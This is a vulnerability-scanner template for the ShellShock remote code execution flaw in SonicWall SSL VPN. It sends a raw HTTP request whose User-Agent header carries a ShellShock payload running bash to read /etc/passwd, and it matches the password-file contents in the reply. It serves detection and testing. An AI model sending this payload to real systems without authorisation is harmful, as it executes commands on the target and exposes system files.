id: sonicwall-sslvpn-shellshock

info:
  name: Sonicwall SSLVPN - Remote Code Execution (ShellShock)
  author: PR3R00T
  severity: critical
  description: |
    Sonicwall SSLVPN contains a 'ShellShock' vulnerability which allows remote unauthenticated attackers to execute arbitrary commands.
  reference:
    - https://twitter.com/chybeta/status/1353974652540882944
    - https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cwe-id: CWE-77
  tags: shellshock,sonicwall,rce,vpn

requests:
  - raw:
      - |
        GET /cgi-bin/jarrewrite.sh HTTP/1.1
        Host: {{Hostname}}
        User-Agent: "() { :; }; echo ; /bin/bash -c 'cat /etc/passwd'"
        Accept: */*

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/05/30